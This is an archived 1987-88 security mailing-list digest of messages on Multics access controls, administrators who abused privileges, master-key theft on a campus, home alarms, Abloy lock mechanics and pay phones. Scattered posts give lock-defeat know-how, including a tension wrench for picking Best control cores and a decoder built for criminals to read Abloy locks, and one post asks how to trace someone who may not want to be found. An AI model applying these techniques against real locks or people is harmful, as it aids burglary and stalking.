(Tuesday) Subject: Re: Why secure systems? From: "Russ_Housley.XOSMAR"@Xerox.COM RE: "I did mean to imply that AIM caused Multics to be insecure." Good. The B2 rating mentioned by Eric Swenson (ejs%acorn@oak.lcs.mit.edu) clearly states otherwise. RE: "I meant that AIM probably causes Multics to be _unusable_, at least by people trying to cooperate on a project, and that it is overkill for the problem it tries to solve." I have witnessed large program development projects on Multics, with AIM enabled, and seen none of the problems you elude to. Most program development efforts deal with only one level of information (classification), so AIM does not even come into play. In those program with more than one level of information, the developers are happy to have AIM because they can use the existing separation mechanism instead of implementing their own. Management is also pleased with AIM; a separation mechanism implemented in the operating system is harder to thwart than one implemented in an application. The B2 rating also gives management a good feeling about the correctness of the implementation. Russ Housley Xerox Special Information Systems Vista Laboratory -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 8 Dec 87 08:39:29 pst From: Doug Claar Subject: Free and open systems counter argument (I hope that this is the right place to send this...) As an interesting contrast to the thought that computer systems should be open and free to all, I thought I would forward this real-life situation (from soc.singles via comp.society) as a counter-argument. Doug Claar HP Information Technology Group UUCP: { ihnp4 | mcvax!decvax }!hplabs!hpda!dclaar -or- ucbvax!hpda!dclaar ARPA: hpda!dclaar@hplabs.HP.COM ---------------forwarded text follows-------------------- [This message is from USENET, the `soc.singles' group, and is an interesting example not only of irresponsible computer administration, but a lack of knowledge that it is wrong (e.g. the person having to post to the group to confirm what is obvious - that the administrators violated the privacy of a users account). -- Dave Taylor] From: David Ehlert @ Portal Communications System OK...Here is a dilemma that my SO [`Significant Other'] and I have run into. We live about 70 miles apart, and rely on UUCP mail as our primary way of communicating. Just this evening, I received a call from her about the following problem. Where she goes to school, two guys that she use to date, have superuser priviliges. Well, this evening, they went into her mail file. They screwed around with her login, and also deleted all saved mail messages. When one of the guys was approached about the happenings, he denied it. Later, all of my girlfriends files and all were deleted. Now she has to re-construct all of her labs so that she can pass a couple of classes. The dilemma is actually a nuisance, but I would like everyone and anyone to comment on what has happened. I guess that the easiest way is to answer the following question...... What would you do [if someone] did that to you..?? and... What would your company/school do if they found out...?? Here are two guys who are about ready to graduate after at least 5 years of school, and to me, it sounds as if they have still refused to grow up. David... -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Fri, 11 Dec 87 13:00:19 EST From: bzs@bu-cs.bu.edu (Barry Shein) Subject: Why secure systems? (response to Louis Judice responding to my note): >I suspect that YOUR >department head would have trouble if the comp center came to him/her >and said, "oh, we're going to charge your department $40,000 for >network usage which we cannot account for..." First, an understanding, I'm not analyzing a black box, I *am* management in said computing center, tho my relationship with some of these entities is purely horizontal. No, no one is imposing anything (at least in terms of some external force with power saying "account for that!"), the buck stops here. The only thing imposed is of course budget constraints. There are several ways to manage these things. On the one hand it sounds intuitively appealing to become a utility and charge on a strict usage basis. On the other hand the two forces working against that is, first, the fear (not entirely unrealized) that a massive amount of the revenue for that sort of charging just goes right back into the process of generating charges. For example, systems programmers to add proper accounting methods to software, applications programmers to build summary statistics and account maintenance software, source licenses which might only be needed because of a self-imposed requirement to account in a uniform manner, administrative help to deal with accounts, apply chargebacks, chase down delinquent accounts (eg. people who keep running up charges after their grants run out, whaddya gonna do? sue them?), hear poverty cases (also known as "if you could seed us this amount we could prototype and get granted within two years", or, "I know I'm out of money but if I don't get enough freebies to finish this grant the University's name is mud"), management time to simply provide a design and guidelines etc etc etc etc. The second force is that we all do, at some level, eat out of the same trough. Internally organizations (University's are not unique in this respect) are really much more like socialist organizations with perhaps a limited form of capitalism (eg. light and heat are paid for by the central organization out of "heavy taxation", also known as overhead chargebacks to contract income.) A lot of waste could be saved by establishing uniform "taxation" to cover these costs just as we do with other things on the campus. People who overuse such facilities can be dealt with in other ways, the feedback mechanism of chargeback systems is not at all ideal, just one possibility. It's all rather subtle, really. >I don't think the issue is security in central environments. It's >just poorly managed central environments that don't serve user needs! Oh, definitely agreed. -B -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Thu, 10 Dec 87 20:14:00 EST From: Chris Torek Subject: Re: Computer security systems. ... Banks have safes. Houses and cars have locks. I doubt that the proponents of "open-systems" leave their houses and cars unlocked. Probably true. On the other hand, have you ever lived in an area in which you can leave things unlocked, need not count your change, and can trust your neighbors simply because they are your neighbors? It usually comes as a shock to urbanites and suburbanites, but such places do exist. They are, alas, all too rare; that does not mean we should not strive for them. (Unfortunately, this seems to be a direct effect of population density, and hence most people will not experience it.) Chris From: *Hobbit* 11-Jan-1988 22:22:49 To: Security: ; Subj: [8734] Security msgs re: master keys -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: gwyn@brl-smoke.arpa (Doug Gwyn ) Subject: Re: master key security Date: 4 Dec 87 18:14:28 GMT >am I correct >in thinking that it would be within the realm of possibility for our >locksmiths to re-do the master keying in such a way as to avoid the need >to cut and issue new keys to residents (i.e. change ONLY the master keying)? It depends to some degree on how the masterkeying scheme is set up, but in general it would indeed be possible to switch to a different master (at the level of the stolen one) while invalidating few or none of the other keys in the system. During the transition, presumably legitimate possessors of the master would also have the new one, so that the locks could be gradually changed over. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 08 Dec 87 08:09 LCL From: Ken De Cruyenaere 474-8340 Subject: Master Key security Sounds like you should abandon keys altogether and replace the locks with push-buttom combination locks, or the more expensive option: a card access system. Here at the Univ. of Manitoba we have a card access system controlling access to our more important areas, including the mainframe computer room, and one "terminal" area filled with IBM PS2s. (our system has just expanded to 16 doors controlled by card access). Other areas have combination locks. Both system allow quick and easy "rekeying" -if you suspect the code has become known change the code. If a card is lost or stolen - disable the card. We also have burglar alarm systems installed in most areas, sending a signal to the campus police and to the computer room (staffed 24 hrs) which has a bank of CCTV monitors showing the remote areas. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: awr@tybalt.caltech.edu (Bruce Rossiter) Subject: Re: master key security Date: 8 Dec 87 13:48:51 GMT I'd suggest putting the most important areas on *non-master* keys. For example, if you have a distinct area within the building that can be locked up tight, with *very* restricted keying and no mastering, that might be a viable method. I'd also suggest some alarm systems for the computers themselves, if not for the whole area. You might also look into pressure sensitive alarm pads, so that if a computer is moved more than a preset amount, alarms go off at the campus security area, or even the local police station. Personally, I'd vote for a Medeco, non-master system on the doors. Good luck! -Bruce ---------- ARPAnet awr@tybalt.caltech.edu BITNET awr@caltech.BITNET UUCP {amdahl,rutgers}!cit-vax!tybalt.caltech.edu!awr -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 8 Dec 87 19:49:30 EST From: Douglas Humphrey Subject: Re: master key security I can feel for this mans problems ! I would suggest that you find the funds (take a PC or two to the pawn chop if need be) and buy some Medecos and have them installed on the doors. So what if they are not mastered. So what if people end up with a boat load of keys. That seems to be the way it has to be in the short run. A thousand dollars or two can save you the money and hassle expenses, and might just let you sleep at night, which is worth a LOT of money all by itself. In the long run, an electronic system with DOOR BOLTS and not strikes might be a good way to go. You can do this yourself pretty cheaply, or contract it out if you don't have the man hours available. Doug -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: mitch@stride1.UUCP (Thomas P. Mitchell) Subject: Re: master key security Date: 10 Dec 87 17:50:41 GMT >We know they are after a master, the locksmiths know. >Can anyone else offer any suggestions? The only sugestion I can offer is to add an alarm system to the rooms. When I was in school security was terrible. The same type of locks was used on a door to a 10 Million dollar lab as was used on a class room with two nubs of chalk and a worn out eraser. Portable equipment PC's, typeriters, calculators, terminals, copy machines and the like need better security from theft. But the problem is more than theft. The loss of control of master keys is a real nasty problem in a university. I got nailed by this at least once when I was in school. Two years after the fact I heard a tail of a quant. chem. class that someone aced the curve on because he 'salted' the samples in the drying ovens (He made a master key to get in the lab.). I spent five weeks trying to get two analyses to check within the required limits. When I drew a new sample I was done in no time. I can only assume that my sample was one of the ones 'salted'. I was also not the only one in the lab night after night. Theft of passwords or introduction of a virus in a computer lab opens the same door of abuse. Thomas P. Mitchell (mitch@stride1.Stride.COM) Phone: (702) 322-6868 TWX: 910-395-6073 MicroSage Computer Systems Inc. a Division of Stride Micro. Opinions expressed are probably mine. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Thu, 10 Dec 87 12:56:06 pst From: quintus!gregg@Sun.COM (W. Gregg Stefancik) Subject: RE: Best control wrench I suggest a test to determine the actual effectiveness of such a tool. According to my source (a book published by the National Locksmith devoted to the subject of interchangeable cores the name of which currently escapes me), this designing this type of tension wrench made it much easier for him to pick the control shear. Some one out there must have a Best core and the proper tools to design and use the tension wrench. If I had a Best core or access to one I would be more than happy to test this technique out, but unfortunately I don't currently own any Best cores. The tension tool I saw pictured in the book looked like the average tension wrench (of the HPC variety) with a groove filed such that the wrench would contact the control shell only. Gregg -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: cvl!dlm@cuuxb.att.com (Dennis L. Mumaugh) Subject: Re: master key security Date: 11 Dec 87 00:54:37 GMT Look at what the "pros" do. At NSA the system is different. Yes, they may have master key systems, but for really serious areas they have a special deal: The lock is a dead bolt which is surrounded with at metal shell with a flap. The flap is a hasp with a flange though it for a normal pad lock. When locking, one locks the normal dead bolt lock. Then closes the hasp, and places a combination pad lock through the hasp and locks the pad lock. One has to rip off the whole assembly to get in. The pad lock is a Sargent-Greenleaf lock that is very difficult to open normally and almost impossible to pick. The work factor of the whole system is 10 hours. Obviously cleaning and maintenance people need appointments to get in. Security has to have a sealed envelope with the combination (or a cutting torch). -- =Dennis L. Mumaugh Lisle, IL ...!{attunix,ihnp4,cbosgd,lll-crg}!cuuxb!dlm -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: ncoast!mikes@RUTGERS.EDU (Mike Squires) Subject: Re: master key security Date: 20 Dec 87 08:48:55 GMT As a freshman at Caltech in 1963 I took an unofficial course in locks from a club dedicated to the opening of locked doors called the "Mickey Mouse Club". I suspect that a few years later the members were hacking computer systems rather than mechanical locks. The members were only interested in the locks, rather than the contents; one of the leaders took a job at an office in a former bank so that he could work on the old vault lock (unfortunately he opened in in 1/2 hour but had to stay at that job for the rest of the summer). To make a long story short, one of the pieces of information one learned was the combination for the north and south campus grand masters. It is my understanding that this situation was well known to the administration, but that they were unwilling to spend the money to rekey the campus (was it ever done? ) and realized that the new combination could be discovered in minutes anyway, with some luck. In any case, all of the students learned to pick pin tumbler locks in seconds so that possession of the master key was not very important. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: meow!kyle@uunet.uu.net (kyle) Subject: Re: master key security Date: 23 Dec 87 04:13:31 GMT Sure, but a K-tool only works on deadbolts. If you want to remove the core from a doorknob you will have to resort to other means. (maybe use the flat end of an ax? :-) ) -- Kyle Rhorer meow!kyle@nuchat.UUCP From: *Hobbit* 12-Jan-1988 05:00:30 To: Security: ; Subj: [3627] Security msgs re: home security -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: hplabs!felix!zemon@RUTGERS.EDU (Art Zemon) Subject: Re: Home security Date: 4 Dec 87 22:04:57 GMT The best suggestions from our local police (courtesy of many Neighborhood Watch meetings) are simply to make your home an unattractive target. The ways to do this are pretty simple and inexpensive. Install exterior lights and leave them on all night -- not just until you go to bed. Make the house look occupied at all times. Leave lights and maybe a radio or TV turned on when you are not home. If you really want to get carried away, unhook the phone ringers. This isn't really necessary because most burgleries are not carefully plotted and schemed. Almost no one is going to bother phoning to see if the lights are on but nobody is home. Make sure your windows are locked with locks that don't give way easily. A burgler will try to pry a window open (silently) but usually won't bother with the mess (and noise) of breaking glass. Start a Neighborhood Watch program. Your best protection is the nosy neighbor across the street who is always peering out the front window and ready to dial 9-1-1. -- -- Art Zemon By Computer: ...!hplabs!felix!zemon By Air: Archer N33565 By Golly: moderator of comp.unix.ultrix -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 08 Dec 87 16:06:23 EDT From: Jeffrey R Kell Subject: Re: Driveway Metel Detector >I am very interested in obtaining the schematics for the >circuitry that electronically detects cars at left turn lanes, etc. A quick, inexpensive way of doing this would be using 'electric eye' type circuits but with GaAs infrared LED's. They're inexpensive, easy to hide, and give off no visible light. Put the LED transmitter on the end of your driveway (such as on a mailbox, or concealed on a driveway marker) and have it transmit diagonally across the driveway to a detector at the house. That's the basics, but you can have false-alarms with a single beam. Using two parallel beams about 4 feet apart, setting 'alarm' only on a double-break, would avoid scaring the wife when a dog strolls by. This would seem much easier than tearing up your driveway to install or repair a pressure-sensitive or metal-detecting device. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 08 Dec 87 23:24:44 PLT From: Shawn Clabough <24847843%WSUVM1.BITNET@WISCVM.WISC.EDU> Subject: Re: Driveway Metel Detector Most left turn signals detect a car waiting with a coil of wire buried beneath the pavement. When the car travels over the coil, current is made and detected by the turn signal circuit. One problem with this is that some small cars and many motorcycles will not cause enough current to trigger the light. A better and cheaper way to detect a car pulling up in the driveway is to use a light sensor, like what is used in 7-elevens when you enter the door, the light is obstructed and a bell is sound. Using this system, your driveway would not have to be dug up to install a coil. Placed at the bottom of the driveway, the light sensor will detect any vehicle entering the driveway. I'm not sure what one of these cost, but I'm sure your nearest Radio Shack will have information on these systems. Shawn Clabough Bitnet (24847843@WSUVM1) From: *Hobbit* 12-Jan-1988 17:18:02 To: Security: ; Subj: [10829] Security msgs re: various topics -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: mimsy!cvl!decuac!netsys!wb8foz@RUTGERS.EDU (David Lesher) Subject: Re: Car alarms Date: 6 Dec 87 18:45:57 GMT Most of the inexpensive auto alarms use a current transformer or a voltage sensor on the internal wiring harness. In either case the system looks for a step change, indicating a dome lamp has come on. Of course, if the trunk or hood has no light, or the passenger door switch is bad, or the rear doors have no switches, well then you are SOL. Conversely, if the clock motor starts, or the cellular phone receives a call everybody knows it. -- Have you ever WATCHED cable TV, Judge Kennedy? decuac!netsys!wb8foz -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sat, 5 Dec 87 07:46:53 EST From: Chris Torek Subject: Re: virus alert There is a flaw in this announcement. Nowhere does it mention that this affects IBM PCs. It became obvious to me when it mentioned Norton utilities, but only because I have IBM PC knowledgeable friends. (It does mention PC somewhere, but not IBM PC.) Chris -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: 10 Dec 87 08:09:25 EST From: *Hobbit* Subject: Abloy Abloys are "high security" locks, on a par with Medeco as far as the commercial market is concerned. I cannot believe that Manhattan locksmiths can't deal with it; there are Abloys in use all *over* NYC. The reason there's so much slop is that the key doesn't push pins up, it turns little disks around inside to a certain amount, allowing a sidebar type of thing to drop into slots when they line up. It works much like a dial-type combination lock, except that the disks all turn together as you rotate the key through the first 90 degrees. The clearance between the key and the holes in the disks is not too critical; the angle to which the disk is turned is what is. I would heartily recommend that you hang on to your Abloy, try to find someone who can dupe a key for it. If you're feeling enterprising you can take the thing apart and see how it works, and make yourself a duplicate key with a little creative metalwork. _H* -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Subject: Re: Lock Query Date: Thu, 10 Dec 87 22:52:36 -0500 From: Fred Blonder I inherited an "Abloy" lock on my front door. Was wondering if the lock theory experts on this list have had any experience or comments about this sort of lock. Here's what I recall from an article about the Abloy lock in Popular Science (yeah, I used to read it) when it first came on the market. Instead of having pins, the Abloy has a series of disks, stacked in a row along the lock's horizontal axis (Figure 1). Each disk has a cutout in the shape of an Archimedes Spiral: the distance-from-the-center-axis varies linearly with the angle. Initially, all the disks are lined up so that the maximum spiral-size lines up with the keyway, to make room for the maximally-large key, that is one with no cuts. When the key is inserted - unlike in a pin-tumbler lock - nothing moves to 'feel' the key's shape (Figure 2). The unlocking action does not occur as soon as the key is fully inserted. As the key is rotated in the lock, it eventually comes up against the spiral edges of the cuts in the disks. Since the surface is spiraled, the exact point in the key's rotation where this occurs depends on the height that the key has been cut to at the point where it passes through that particular disk. Once the key is touching the disk, further rotation of the key drags the disk along with it for the remainder of the key rotation. At the end of rotation, the disks will be in a scrambled state, at least as determined by the inner spiral cut, but one which conveniently happens to line up the notches in the outer edges of the disks, which allows a bar which spans the disks, to drop into the groove formed by the lined-up notches. (Sort of like in a combination lock.) Further rotation of the key, disks, and bar, finally slide the bolt or whatever it is that the lock is controlling. When rotating the key back the other way, it presses against the non-spiraled edge of the disks' inner cutouts, and drags them all back to the starting configuration. A consequence of all this is that the wrong key will rotate in the lock, but not open it. I think the difficulty in picking it arises mainly by virtue of the fact that it is so bizarre. You'd need to manipulate the little disk-thingys while attempting to get the bar to drop. Sort of the worst of picking a pin-tumbler lock combined with picking a combination lock. Disks +-+-+ v v v v v | | | | | ___ | |_| | | _|/ \ /-|/| |\|_|/ | | <- This key is fictitious. Any resemblance \_|_|_|_|_|__| | to the bitting on anyone's actual key | | | | | |\___/ is purely coincidental. | | | | | Figure 1. (Side view) The notch (Actual position may vary.) | V _ _____ _- U__ -_ - - ^| - / / H| \ (The thing consisting of the letters H and U / | H| \ and the caret, is a cross-section of the key, | \_ H| | in case you can't guess.) \ \U| / \ - / -_ _- -_______- Figure 2. (Front view) Fred Blonder (301) 454-7690 seismo!mimsy!fred Fred@Mimsy.umd.edu -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Fri, 11 Dec 87 13:47:23 EST From: bzs@bu-cs.bu.edu (Barry Shein) Subject: Bumper Beepers. There is a company called "Recco" (I think that's right, I know it's pronounced Reek-oh) which manufactures a variety of little boxes that can be worn or carried by outdoors people to assist in rescuing in the event of a problem (eg. buried under snow.) They've been advertising their stock on FNN. I don't know if they sell the locator which they presented as being in the possession of typical rescue units, such as helicopter mounted. -B -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: macleod@drivax.UUCP (MacLeod) Subject: Abloy locks Date: 13 Dec 87 09:33:27 GMT My father was an eccentric sort of character who liked challenges. Through friends, he was contacted by some organized crime types who wanted a pick for Abloy locks. From what I understood, at the time the casinos in Nevada had just changed over to these locks on their slot machines. The keys to these locks were cylindrical and had cuts made at (I think) multiples of 15 degrees. My father built a peculiar looking device that took a lot of complex machining, with a half dozen or so (one for each cut) fingers that lifted into place and then were stopped down with a friction collar. The pick was inserted and manipulated until the fingers "read" the bevels in the lock, locked down, and withdrawn. The user then went off and made a key to those specs. I don't know if he ever perfected the scheme, but it was complex enough to keep him occupied and interested for about six months. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sat, 12 Dec 87 09:28:54 EST From: "Wayne S. Mery" Subject: Re: All related computer crimes and out come. This past summer I atteneded a regional ISSA conference near Baltimore, MD. The conference was in Timonium, MD and sponsored by the Easterm PA and Baltimore ISSA chapters. A portion of the proceedings was given to a panel consisting of 2 Baltimore county PD officers who comprise that PD's computer/electronic crimes section, an FBI agent, a Secret Service agent, and others. The PD unit up to that time had a 100% conviction rate. Several investigations were pending at that time. Some of their cases, including convictions, were interstate crimes. You would do well to contact these people. I expect in addition to first hand info., that they have excellent connections to other organizations who could help in your study. John Imhoff, FBI William Wess, Secret service Det. Calvin Lane, Baltimore County PD Det. Frank Simmons, Baltimore County PD Happy hunting Wayne S. Mery Systems Programmer Lehigh University Bethlehem, PA -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: darrell@sdcsvax.ucsd.edu (Darrell Long) Subject: Finding a long-lost person Date: 17 Dec 87 20:43:18 GMT I'd like to start a discussion of how to find a person. For, example, suppose you want to find an old friend from high school who left the state 10 years ago because the Hell's Angels were after him. I don't know anyone like that, but just suppose... How would you go about finding such a person? The obvious security issue here is perhaps this person does not want to be found. DMV records would be the first place I would look, then perhaps at Social Security. But who has access to these records? Suppose you had a female friend that you'd lost track of: there's a good chance she has married and thus changed her name. How does this complicate the search? What rights w.r.t. privacy does one have if they do not want to be found? (As we know from the Bork hearings, there is no Constitutional right to privacy.) DL -- Darrell Long Department of Computer Science & Engineering, UC San Diego, La Jolla CA 92093 ARPA: Darrell@Beowulf.UCSD.EDU UUCP: darrell@sdcsvax.uucp Operating Systems submissions to: comp-os-research@sdcsvax.uucp -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sun Dec 27 22:25:18 1987 From: wrtfac!hassler@lognet2.ARPA (Barry D. Hassler) Subject: Link Encryption Devices Has anyone had any experience with link encryption devices? I am looking for information on devices which can encrypt synchronous and asynchronous lines at speeds at least up to 56 Kbps. Of special interest would be devices that can be used in a dial-up environment (I imagine this would mean being able to turn the encryption on and off to control a modem). Please respond to me directly - I'll attempt to summarize back to the group if there is enough interest. -BDH Barry D. Hassler hassler%wrtfac@lognet2.arpa System Software Analyst Control Data Corp. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 15 Dec 87 19:41:09 EST From: John Hanley Subject: Re: Picking locks on pay phones Maybe pay phones maintained by the BOCs don't have alarms, but a friend of mine is having an independent manufacturer install a pay phone at his store, and he claims that not only can it be programmed to call a number when it's coin box is full and announce in an incredibly sultry voice that it's time to collect, but it can also dial a number and shout for help when it thinks it's being broken into. --JH